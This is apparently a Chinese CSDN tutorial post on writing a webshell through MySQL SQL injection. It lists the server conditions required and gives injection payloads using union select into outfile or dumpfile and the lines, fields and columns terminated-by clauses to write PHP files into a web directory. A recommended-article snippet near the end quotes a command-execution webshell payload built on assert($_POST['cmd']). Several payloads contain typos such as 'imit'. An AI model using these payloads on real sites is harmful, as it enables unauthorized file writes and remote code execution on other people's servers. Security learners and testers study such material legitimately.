【知识整理】利用SQL语句写shell的方法

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量3.5k 收藏 14
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42288123/article/details/105020545
版权

利用SQL语句写shell的方法

要利用sql写shell就需要在配置中满足以下条件:

  1. 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。
  2. 未开启全局GPC
关于mysql的secure_file_priv属性得多说几句
当secure_file_priv为空时,mysql对导入导出文件是没有限制的
当secure_file_priv为目录地址时,mysql可以在目录位置下进行导入导出操作
当secure_file_priv为NULL时,mysql就不能进行导入导出操作

使用sql语句select @@secure_file_priv即可查询参数的内容,从而判断该数据是否可以进行导入导出操作。

下面就进入正题,关于利用sql语句写shell的方法

union select 后写入

这个方法是非常常见的方法,在union select 后拼接 into dumpfileinto outfile来进行写shell

?id=1’ union select 1,2,’<?php phpinfo();?>’ into dumpfile ‘c:/www/info.php’#
?id=1’ union select 1,2,’<?php phpinfo();?>’ into outfile ‘c:/www/info.php’#

lines terminated by 写入

?id=1’ into outfile ‘C:/www/info.php’ lines terminated by ‘<?php phpinfo();?>’#
?id=1’ imit 1 into outfile ‘C:/www/info.php’ lines terminated by ‘<?php phpinfo();?>’#

拼接sql语句后,数据库处理的sql语句

select * from tables where id = 1' into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';

注入原理
通过select语句查询的内容写入文件。
lines terminated by xx的作用是在每行终止的位置添加xx内容。

lines starting by 写入

?id=1’ into outfile ‘C:/www/info.php’ lines starting by ‘<?php phpinfo();?>’#
?id=1’ imit 1 into outfile ‘C:/www/info.php’ lines starting by ‘<?php phpinfo();?>’#

注入原理
ines starting by xx可以理解为 以每行开始的位置添加 xx 内容。

fields terminated by 写入

?id=1’ into outfile ‘C:/www/info.php’ fields terminated by ‘<?php phpinfo();?>’#
?id=1’ imit 1 into outfile ‘C:/www/info.php’ fields terminated by ‘<?php phpinfo();?>’#

注入原理
fields terminated by xx可以理解为 以每个字段的位置添加 xx 内容。

COLUMNS terminated by 写入

?id=1’ into outfile ‘C:/www/info.php’ COLUMNS terminated by ‘<?php phpinfo();?>’#
?id=1’ imit 1 into outfile ‘C:/www/info.php’ COLUMNS terminated by ‘<?php phpinfo();?>’#

注入原理
COLUMNS terminated by xx可以理解为以每列的位置添加 xx 内容。

参考资料

super小明
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql注入拿shell条件与方法(统计)
Vdieoo的博客
10-30 7762
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
【笔记】SQL查询语句的基本使用方法
热门推荐
xbean1028的博客
02-15 1万+
SQL查询语句的基本使用方法 基本查询 SELECT查询语句 --查询所有的学生的学号和姓名 USE JXGL SELECT SNO,SNAME FROM S 简单查询 --查询所有的学生的姓名,学号,所在系 SELECT SNAME,SNO,SDEPT FROM S --查询全体学生的详细信息 SELECT * FROM S --前一个语句等价于: ...
sql注入shell
weixin_51646864的博客
04-23 6745
靶场练习一下sql注入shell方式
PostgreSQL下的SQL Shell(psql)工具
07-18 2875
首发微信公众号:SQL数据库运维 原文链接:https://mp.weixin.qq.com/s?__biz=MzI1NTQyNzg3MQ==&mid=2247485130&idx=1&sn=9606e27c6e449bb44682888a28b93920&chksm=ea3752badd40dbac550cc06c87a6e2e91e50c80842716de6...
sqlshell原理_sql注入shell的条件
最新发布
2401_84281655的博客
05-17 774
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可权限即secure_file_priv = ''配置为空原因是--os-shell参数shell使用的是select xx into outfile而secure_file_priv此配置。
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2056
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
Shell脚本中执行sql语句操作mysql的5种方法
09-15
主要介绍了Shell脚本中执行sql语句操作mysql的5种方法,本文讲解了将SQL语句直接嵌入到shell脚本文件中、命令行调用单独的SQL文件、使用管道符调用SQL文件等方法,需要的朋友可以参考下
Django shell调试models输出的SQL语句方法
09-18
本文将详细介绍如何在Django shell中调试models,以便查看它们输出的SQL语句。 首先,我们需要在`settings.py`文件中配置日志模块。Django的日志系统允许我们控制应用程序的日志输出。添加以下配置以启用SQL语句的...
MySQL的一些常用的SQL语句整理
09-10
MySQL是世界上最流行的开源关系型数据库管理系统之一,它提供了一系列用于数据操作和管理的SQL语句。本文将深入探讨一些MySQL中常用的SQL语句,包括显示数据库、创建数据库、删除数据库以及选用数据库等基本操作。 ...
SQL——shell命令
qq_36912885的博客
09-02 1796
8.0之后的sql毛病是真鸡多,把这些常用的命令的都记录下来。里面包含了从安装到使用,远程登录,密码,redis,等等乱七八糟的问题。
sqlshell原理
xyxyxyxyy的博客
09-14 796
主要阐述了sqlmap工具webshell到mysql中的原理
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7776
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
sqlserver手注getshell分析:
m0_59757868的博客
08-19 2530
sqlmap
SQL Shell常用的指令
weixin_46653974的博客
08-08 704
1、\c或\connect :连接到数据库。12、\s或\set:设置SQL Shell的变量。6、\i或\include:从文件中执行SQL指令。11、\timing:启用\禁止查询执行时间的显示。16、\x或\X:切换输出模式为扩展模式,以便更好地显示复杂的查询结果。10、\h或\help:显示SQL Shell的帮助信息。8、\g或\gexec:执行当前输入的SQL命令。7、\e或\edit:编辑当前输入的SQL命令。4、\l或\list:显示所有数据库的列表。2、\d或\dt :显示数据库中的表。
SQL注入webshell
huangyongkang666的博客
03-25 2735
SQL注入webshell 1.MySQLshell 入WebShell的几种方式 1、利用Union select 入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
SQL Server从0到1——shell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-07 842
exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据。注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复。
MySQL注入shell的条件
huang0612123的博客
05-13 308
HVV面试
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1590
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值